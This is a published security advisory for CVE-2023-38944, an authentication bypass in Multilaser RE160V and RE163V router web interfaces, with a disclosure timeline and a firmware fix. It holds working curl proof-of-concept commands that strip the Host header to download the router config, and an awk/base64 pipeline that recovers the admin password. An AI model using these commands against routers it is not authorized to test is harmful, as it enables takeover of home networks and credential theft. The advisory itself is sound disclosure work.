Multilaser RE160V Header Manipulation Access Bypass

`[email protected]>  
Status: RO  
Content-Length: 5433  
Lines: 153  
  
=====[Tempest Security Intelligence - Security Advisory -  
CVE-2023-38944]=======  
  
Access Control Bypass in Multilaser routers' Web Management Interface  
  
Author: Vinicius Moraes < vinicius.moraes.w () gmail com >  
  
=====[Table of  
Contents]========================================================  
  
1. Overview  
2. Detailed description  
3. Other contexts & solutions  
4. Acknowledgements  
5. Timeline  
6. References  
  
=====[1.  
Overview]==============================================================  
  
* Systems affected: Multilaser RE160V web interface - V12.03.01.09_pt  
(verified)  
(other routers/versions may be  
affected)  
Multilaser RE163V web interface - V12.03.01.10_pt  
(verified)  
(other routers/versions may be  
affected)  
* Release date: 28/02/2024  
* CVSS score: 7.7 / High  
* CVSS vector:  
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N  
* Impact: This vulnerability allows attackers to bypass the access control  
of  
the routers' web interface and perform management actions, such as  
changing the DNS settings, enabling router remote access,  
changing the  
IP routing table, and retrieving the WiFi and management  
application  
passwords. A noteworthy aspect also regards the fact that the  
attack  
can be conducted remotely.  
  
=====[2. Detailed  
description]==================================================  
  
The affected Multilaser routers have a web management interface designed to  
graphically assist users in configuring features and diagnosing problems.  
However, there is a bug in its access control mechanism that allows  
unauthenticated users to access the routers' management features.  
  
In order to exploit this bug, it is necessary to remove the Host header of  
the  
HTTP requests. The following example shows how an unauthenticated user (not  
bearing a credential or session token) could perform it by using the curl  
tool[1] to retrieve, for example, a backup of the router config:  
  
[snippet]  
$ # traditional unauthenticated request being redirected to the login page  
$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/RouterCfm.cfg | head -8  
HTTP/1.0 302 Redirect  
Server: GoAhead-Webs  
Date: Sun Jun 28 11:59:42 2009  
Pragma: no-cache  
Cache-Control: no-cache  
Content-Type: text/html  
Location: http://[routerIpAddress]/login.html  
  
$ # malicious unauthenticated request getting the router config  
$ curl -isOH 'Host:' [routerIpAddress]/cgi-bin/DownloadCfg/RouterCfm.cfg  
$ head -8 RouterCfm.cfg  
HTTP/1.0 200 OK  
Date: Sun Jun 28 12:00:00 2009  
Server: GoAhead-Webs  
Last-modified: Sun Jun 28 12:00:00 2009  
Content-length: 16108  
Content-type: config/conf  
Connection: close  
  
[/snippet]  
  
By performing the aforementioned steps, an attacker gains access to all  
features  
of the web interface, either by exploiting the issue in other endpoints or  
by  
using the interface password, contained in the router config, as a  
traditional  
user:  
  
[snippet]  
  
$ # getting the web interface password (in this example: "myPass333")  
$ # stored in base64 in the config file  
$ awk -F 'd=' '/http_passwd=/{ print $2 }' RouterCfm.cfg | tr -d '\15'  
bXlQYXNzMzMz  
$ # decoding the web interface password  
$ echo "bXlQYXNzMzMz" | base64 -d  
myPass333  
  
[/snippet]  
  
This vulnerability can be exploited remotely via a malicious mobile/desktop  
application performing HTTP requests against the router, or locally by  
connecting to a vulnerable router (such as through the wireless  
infrastructure  
of a coffee shop or airport).  
  
=====[3. Other contexts &  
solutions]============================================  
  
Conceptually, in order to fix this issue, the server receiving the request  
must  
always validate the session token as a prerequisite for enforcing access  
control, regardless of any header. Upon not receiving a valid session token  
within the request, users should be redirected to the login page.  
  
Practically, to mitigate this issue, the routers should be updated to  
firmware  
V12.03.01.12 or newer[3][4].  
  
=====[4.  
Acknowledgements]======================================================  
  
Joaquim Brasil de Oliveira < palulabrasil () gmail com >  
< twitter.com/palulabr >  
Tempest Security Intelligence[2]  
  
=====[5.  
Timeline]==============================================================  
  
28/04/2023 - The bug regarding model RE163V was reported to the vendor;  
29/06/2023 - A new contact was made with the company;  
29/06/2023 - Vendor informed they were analysing the bug;  
19/07/2023 - Vendor shared a new firmware update for RE163V;  
25/07/2023 - The same bug in model RE160V was reported to the vendor;  
04/08/2023 - Vendor shared a new firmware update for RE163V;  
30/08/2023 - Vendor fixed the bug in RE163V with firmware V12.03.01.12;  
16/10/2023 - Vendor fixed the bug in RE160V with firmware V12.03.01.12;  
26/10/2023 - vendor released the updates on its website[3][4].  
  
=====[6.  
References]============================================================  
  
[1] https://curl.se  
[2] https://tempest.com.br  
[3]  
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v  
[4]  
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v  
  
`